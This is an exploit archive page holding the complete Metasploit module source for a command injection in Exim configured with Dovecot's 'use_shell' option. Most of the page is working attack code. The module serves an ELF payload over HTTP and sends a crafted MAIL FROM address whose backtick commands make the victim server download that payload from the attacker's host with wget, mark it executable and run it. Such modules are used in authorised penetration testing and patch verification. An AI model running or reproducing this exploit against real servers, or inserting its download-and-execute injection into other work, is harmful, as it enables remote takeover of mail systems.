exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Exim and Dovecot Insecure Configuration Command Injection

Exim and Dovecot Insecure Configuration Command Injection
Posted Jun 10, 2013
Authored by juan vazquez, temp66, eKKiM | Site metasploit.com

This Metasploit module exploits a command injection vulnerability against Dovecot with Exim using the "use_shell" option. It uses the sender's address to inject arbitrary commands since this is one of the user-controlled variables, which has been successfully tested on Debian Squeeze using the default Exim4 with dovecot-common packages.

tags | exploit, arbitrary
systems | linux, debian
advisories | OSVDB-93004
SHA-256 | d72b6de0ba7eaf73295bab2780dde4862dd95a6711d35c8ea50c93c6aad58c90

Exim and Dovecot Insecure Configuration Command Injection

Change Mirror Download
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::Smtp
include Msf::Exploit::Remote::HttpServer
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper


def initialize(info = {})
super(update_info(info,
'Name' => 'Exim and Dovecot Insecure Configuration Command Injection',
'Description' => %q{
This module exploits a command injection vulnerability against Dovecot with
Exim using the "use_shell" option. It uses the sender's address to inject arbitary
commands since this is one of the user-controlled variables, which has been
successfully tested on Debian Squeeze using the default Exim4 with dovecot-common
packages.
},
'Author' =>
[
'Unknown', # From redteam-pentesting # Vulnerability Discovery and PoC
'eKKiM', # PoC
'juan vazquez' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'OSVDB', '93004' ],
[ 'EDB', '25297' ],
[ 'URL', 'https://www.redteam-pentesting.de/advisories/rt-sa-2013-001' ]
],
'Privileged' => false,
'Arch' => ARCH_X86,
'Platform' => 'linux',
'Payload' =>
{
'DisableNops' => true
},
'Targets' =>
[
[ 'Linux x86', { }],
],
'DisclosureDate' => 'May 03 2013',
'DefaultTarget' => 0))

register_options(
[
OptString.new('EHLO', [ true, 'TO address of the e-mail', 'debian.localdomain']),
OptString.new('MAILTO', [ true, 'TO address of the e-mail', 'root@debian.localdomain']),
OptAddress.new('DOWNHOST', [ false, 'An alternative host to request the MIPS payload from' ]),
OptString.new('DOWNFILE', [ false, 'Filename to download, (default: random)' ]),
OptPort.new('SRVPORT', [ true, 'The daemon port to listen on', 80 ]),
OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the ELF payload request', 60])
], self.class)

deregister_options('MAILFROM')
end

# wait for the data to be sent
def wait_linux_payload
print_status("#{rhost}:#{rport} - Waiting for the victim to request the ELF payload...")

waited = 0
while (not @elf_sent)
select(nil, nil, nil, 1)
waited += 1
if (waited > datastore['HTTP_DELAY'])
fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Target didn't request request the ELF payload -- Maybe it cant connect back to us?")
end
end
end

# Handle incoming requests from the server
def on_request_uri(cli, request)
if (not @pl)
print_error("#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!")
return
end
print_status("#{rhost}:#{rport} - Sending the payload to the server...")
@elf_sent = true
send_response(cli, @pl)
end

def exploit

@pl = generate_payload_exe
@elf_sent = false

#
# start our web server to deploy the final payload
#
downfile = datastore['DOWNFILE'] || rand_text_alpha(8+rand(8))
resource_uri = '/' + downfile

if (datastore['DOWNHOST'])
service_url_payload = datastore['DOWNHOST'] + resource_uri
else

# Needs to be on the port 80
if datastore['SRVPORT'].to_i != 80
fail_with(Exploit::Failure::Unknown, 'The Web Server needs to live on SRVPORT=80')
end

#do not use SSL
if datastore['SSL']
ssl_restore = true
datastore['SSL'] = false
end

#we use SRVHOST as download IP for the coming wget command.
#SRVHOST needs a real IP address of our download host
if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::")
srv_host = Rex::Socket.source_address(rhost)
else
srv_host = datastore['SRVHOST']
end

service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + resource_uri
service_url_payload = srv_host + resource_uri
print_status("#{rhost}:#{rport} - Starting up our web service on #{service_url} ...")
start_service({'Uri' => {
'Proc' => Proc.new { |cli, req|
on_request_uri(cli, req)
},
'Path' => resource_uri
}})

datastore['SSL'] = true if ssl_restore
end


connect

print_status("#{rhost}:#{rport} - Server: #{self.banner.to_s.strip}")
if self.banner.to_s !~ /Exim /
disconnect
fail_with(Exploit::Failure::NoTarget, "#{rhost}:#{rport} - The target server is not running Exim!")
end

ehlo = datastore['EHLO']
ehlo_resp = raw_send_recv("EHLO #{ehlo}\r\n")
ehlo_resp.each_line do |line|
print_status("#{rhost}:#{rport} - EHLO: #{line.strip}")
end

#
# Initiate the message
#
filename = rand_text_alpha_lower(8)
from = rand_text_alpha(3)
from << "`/usr/bin/wget${IFS}#{service_url_payload}${IFS}-O${IFS}/tmp/#{filename}`"
from << "`chmod${IFS}+x${IFS}/tmp/#{filename}`"
from << "`/tmp/#{filename}`"
from << "@#{ehlo}"
to = datastore['MAILTO']

resp = raw_send_recv("MAIL FROM: #{from}\r\n")
resp ||= 'no response'
msg = "MAIL: #{resp.strip}"
if not resp or resp[0,3] != '250'
fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - #{msg}")
else
print_status("#{rhost}:#{rport} - #{msg}")
end

resp = raw_send_recv("RCPT TO: #{to}\r\n")
resp ||= 'no response'
msg = "RCPT: #{resp.strip}"
if not resp or resp[0,3] != '250'
fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - #{msg}")
else
print_status("#{rhost}:#{rport} - #{msg}")
end

resp = raw_send_recv("DATA\r\n")
resp ||= 'no response'
msg = "DATA: #{resp.strip}"
if not resp or resp[0,3] != '354'
fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - #{msg}")
else
print_status("#{rhost}:#{rport} - #{msg}")
end

message = "Subject: test\r\n"
message << "\r\n"
message << ".\r\n"

resp = raw_send_recv(message)
msg = "DELIVER: #{resp.strip}"
if not resp or resp[0,3] != '250'
fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - #{msg}")
else
print_status("#{rhost}:#{rport} - #{msg}")
end
disconnect

# wait for payload download
if (datastore['DOWNHOST'])
print_status("#{rhost}:#{rport} - Giving #{datastore['HTTP_DELAY']} seconds to the Linksys device to download the payload")
select(nil, nil, nil, datastore['HTTP_DELAY'])
else
wait_linux_payload
end
register_file_for_cleanup("/tmp/#{filename}")

end

end
Login or Register to add favorites

File Archive:

December 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    2 Files
  • 2
    Dec 2nd
    12 Files
  • 3
    Dec 3rd
    0 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close